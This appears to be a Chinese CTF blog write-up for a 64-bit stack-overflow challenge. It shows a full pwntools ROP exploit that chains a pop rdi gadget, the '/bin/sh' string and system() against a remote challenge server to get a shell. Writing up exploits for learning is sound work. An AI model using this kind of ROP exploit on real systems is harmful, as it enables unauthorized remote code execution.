WuTao's Blog

while(!(succeed = try()));

0%

Lilac Pwn stack3-rop Writeup

发表于 分类于 阅读次数: Valine:
本文字数: 555 阅读时长 ≈ 1 分钟

题目链接

20201101095017

文件类型是 64 位 ELF。

20201101095122

开了 NX 保护。

用 IDA64 查看一下:

20201101100449

可以看到可以栈溢出。

1
objdump -d stack3 | grep 'plt'

20201101095523

可以看到有 system 函数,地址为 0x400600

1
ROPgadget --binary stack3 --string '/bin/sh'

20201101095700

可以看到有字符串 “/bin/sh”,地址为 0x4008a4

由于是 64 位,参数先保存在 RDIRSIRDXRCXR8R9,然后才是栈。

查看是否有可利用的 gadgets:

1
ROPgadget --binary stack3 --only 'pop|ret' | grep 'rdi'

20201101100042

找到一条。

那么可以构造 exp 了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

# p = process("./stack3")
p = remote("47.94.239.235", 2023)

poprdi_addr = 0x400883
system_addr = 0x400600
binsh_addr = 0x4008a4

payload = b'a' * (0x20 + 0x8) + p64(poprdi_addr) + p64(binsh_addr) + p64(system_addr)

p.sendline(payload)

p.interactive()

20201101101355

可以看到成功拿到 shell。

欢迎关注我的其它发布渠道